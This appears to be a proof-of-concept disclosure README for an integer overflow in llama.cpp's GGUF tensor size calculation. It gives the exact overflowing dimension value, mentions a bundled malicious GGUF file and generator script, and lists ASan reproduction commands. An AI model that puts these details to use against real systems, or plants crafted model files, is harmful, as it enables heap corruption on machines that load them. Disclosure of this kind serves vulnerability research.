PoC: Integer Overflow in ggml_nbytes() for Quantized GGUF Tensors
Vulnerability
Integer overflow in ggml_nbytes() (ggml/src/ggml.c:1273) and ggml_row_size() (ggml/src/ggml.c:1302) causes drastically undersized heap allocations when loading crafted GGUF files with quantized tensor types.
For quantized types (Q4_0 through Q8_K, blck_size > 1), the computation ne[0] * type_size / blck_size overflows in the intermediate ne[0] * type_size multiplication before the division, returning a tiny value (e.g., 4 bytes instead of 576 PB).
All existing overflow checks in the GGUF parser pass because they validate the final result (nelements/blck_size)*type_size, not the intermediate product.
Files
malicious.gguf- Crafted GGUF with Q4_0 tensor, ne[0]=1024819115206086208craft_gguf.py- Script to generate malicious GGUF files (supports Q4_0 through Q8_K)test_load.c- Test loader demonstrating the overflow
Reproduction
# Build llama.cpp with ASan
cmake -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" ..
cmake --build . --target llama-gguf
# Run
./bin/llama-gguf malicious.gguf r
Impact
Heap buffer overflow via undersized allocation. Affects llama-quantize, llama-imatrix, control vectors, and examples/gguf (all code paths using no_alloc=false). Variant of CVE-2026-27940/CVE-2026-33298.
- Downloads last month
- -
We're not able to determine the quantization variants.